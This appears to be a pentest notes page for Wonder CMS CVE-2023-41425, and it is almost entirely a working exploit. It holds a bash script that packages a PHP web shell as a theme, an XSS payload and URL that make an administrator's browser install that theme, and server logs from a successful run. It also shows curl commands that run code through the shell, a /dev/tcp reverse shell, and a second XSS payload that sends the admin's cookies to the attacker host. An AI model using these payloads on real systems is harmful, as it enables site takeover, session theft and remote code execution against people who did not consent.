##############
Wonder CMS RCE
##############

|
| Description: stored/reflected XSS leading to RCE (CVE-2023-41425), Wonder CMS 3.2.0 through 3.4.2
| Sources
|   - https://github.com/prodigiousMind/CVE-2023-41425/tree/main
|   - https://nvd.nist.gov/vuln/detail/CVE-2023-41425
|

***
RCE
***

.. code-block:: bash

  # Setting vars
  RHOST="http://host.com:80"
  LHOST="10.10.14.152"
  LPORT="4444"
  LPORTWEB="80"

  # Moving to a tmp dir
  cd $(mktemp -d)

  # Creating our evil theme zip file
  mkdir -p evil
  cat <<'EOF'>evil/evil.php
  <?=`$_GET[0]`;?>
  EOF

  zip -r evil.zip evil/

  # JS payload that will install the new theme
  cat <<EOF>xssrce.js
  var xhr=new XMLHttpRequest();
  xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
  xhr.send();
  EOF

  # Print XSS url
  echo -e "\n# XSS RCE"
  cat <<EOF
  ${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
  EOF

  # Starting a new web server to serve payloads
  sudo python3 -m http.server $LPORTWEB &

|

| Once the XSS URL has been delivered to an administrator and opened in their browser, the web server started above receives the following HTTP requests

.. code-block:: text

  10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 -
  10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
  10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
  10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
  10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| The PHP file shipped inside the installed theme is now reachable under the themes directory and can be used to run commands

.. code-block:: bash

  # id
  CMD="id"
  curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"
  # uid=33(www-data) gid=33(www-data) groups=33(www-data)

  # Reverse shell, (don't forget to listen first: nc -nvlp 4444)
  CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"
  curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

|

*******
Cookies
*******

| The same XSS can also be used to exfiltrate the cookies (and therefore the PHP session) of the administrator who opens the link

.. code-block:: bash

  cat <<EOF>xsscookie.js
  var xhr=new XMLHttpRequest();
  xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true);
  xhr.send();
  EOF
  
  echo -e "\n# XSS Retrieve PHP session"
  cat <<EOF
  ${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"></script><form+action="
  EOF

|